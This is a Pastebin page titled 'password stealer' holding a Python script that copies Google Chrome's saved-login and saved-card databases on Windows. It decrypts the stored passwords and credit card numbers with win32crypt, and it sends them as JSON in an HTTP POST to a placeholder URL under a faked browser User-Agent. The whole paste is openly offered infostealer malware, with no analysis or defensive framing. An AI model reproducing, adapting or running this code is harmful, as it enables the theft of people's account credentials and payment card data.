API tools faq
paste
cooldude12547

password stealer

cooldude12547
Jan 30th, 2019
142
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.49 KB | None | 0 0
raw download clone embed print report
  1. #Made by the meme factory
  2. #Copyright 2019
  3.  
  4. #Imports
  5. import json
  6. import os
  7. import sys
  8. import win32crypt
  9. import sqlite3
  10. import shutil
  11. import urllib.request
  12.  
  13. #Classes
  14. class Password:
  15.     def __init__(self,url,username,password):
  16.         self.url = url
  17.         self.username = username
  18.         self.password = password
  19.  
  20. class CreditCard:
  21.     def __init__(self,name,expiration,number):
  22.         self.name = name
  23.         self.expiration = expiration
  24.         self.number = number
  25.  
  26. class SQLite3Connection:
  27.     def __init__(self,path):
  28.         try:
  29.             self.path = path
  30.             self.connection = sqlite3.connect(self.path)
  31.             self.cursor = self.connection.cursor()
  32.         except:
  33.             pass
  34.     def run(self,query):
  35.         try:
  36.             self.cursor.execute(query)
  37.             return self.cursor.fetchall()
  38.         except:
  39.             pass
  40.     def close(self):
  41.         self.connection.close()
  42.  
  43. class Win32PasswordStealer:
  44.     def __init__(self):
  45.         self.chromepath = "{}\\Google\\Chrome\\User Data\\Default\\Login Data".format(os.getenv("LOCALAPPDATA"))
  46.         self.path = shutil.copy(self.chromepath,"{}\\logins.bak".format(os.getenv("USERPROFILE")))
  47.         self.connection = SQLite3Connection(self.path)
  48.     def steal(self):
  49.         try:
  50.             rows = self.connection.run("SELECT action_url, username_value, password_value from logins")
  51.             passwords = []
  52.             if len(rows) > 0:
  53.                 for row in rows:
  54.                     url = row[0]
  55.                     username = row[1]
  56.                     try:
  57.                         password = win32crypt.CryptUnprotectData(row[2],None,None,None,0)[1].decode()
  58.                     except:
  59.                         pass
  60.                     if password:
  61.                         passwords.append(Password(url,username,password))
  62.                 self.connection.close()
  63.                 os.remove(self.path)
  64.                 return passwords
  65.         except:
  66.             pass
  67.  
  68. class Win32CardStealer:
  69.     def __init__(self):
  70.         self.chromepath = "{}\\Google\\Chrome\\User Data\\Default\\Web Data".format(os.getenv("LOCALAPPDATA"))
  71.         self.path = shutil.copy(self.chromepath,"{}\\cards.bak".format(os.getenv("USERPROFILE")))
  72.         self.connection = SQLite3Connection(self.path)
  73.     def steal(self):
  74.         try:
  75.             rows = self.connection.run("SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted from credit_cards")
  76.             cards = []
  77.             if len(rows) > 0:
  78.                 for row in rows:
  79.                     name = row[0]
  80.                     expiration = "{}/{}".format(row[1],row[2])
  81.                     try:
  82.                         number = win32crypt.CryptUnprotectData(row[3],None,None,None,0)[1].decode()
  83.                     except:
  84.                         pass
  85.                     if number:
  86.                         cards.append(CreditCard(name,expiration,number))
  87.                 self.connection.close()
  88.                 os.remove(self.path)
  89.                 return cards
  90.         except:
  91.             pass
  92.  
  93. #Functions
  94. def main():
  95.     try:
  96.         passstealer = Win32PasswordStealer()
  97.         cardstealer = Win32CardStealer()
  98.         passwords = passstealer.steal()
  99.         cards = cardstealer.steal()
  100.         senddata = {"passwords": [],"cards": []}
  101.         if passwords:
  102.             for password in passwords:
  103.                 senddata["passwords"].append({
  104.                     "url": password.url,
  105.                     "username": password.username,
  106.                     "password": password.password
  107.                 })
  108.         if cards:
  109.             for card in cards:
  110.                 senddata["cards"].append({
  111.                     "name": card.name,
  112.                     "expiration": card.expiration,
  113.                     "number": card.number
  114.                 })
  115.         reqbytes = json.dumps(senddata).encode()
  116.         req = urllib.request.Request("any url")
  117.         req.add_header("Content-Type","application/json; charset=utf-8")
  118.         req.add_header("Content-Type",len(reqbytes))
  119.         req.add_header("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36")
  120.         urllib.request.urlopen(req,reqbytes)
  121.     except:
  122.         traceback.print_exc()
  123.         sys.exit()
  124.  
  125. #Main
  126. if __name__ == "__main__":
  127.     main()
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!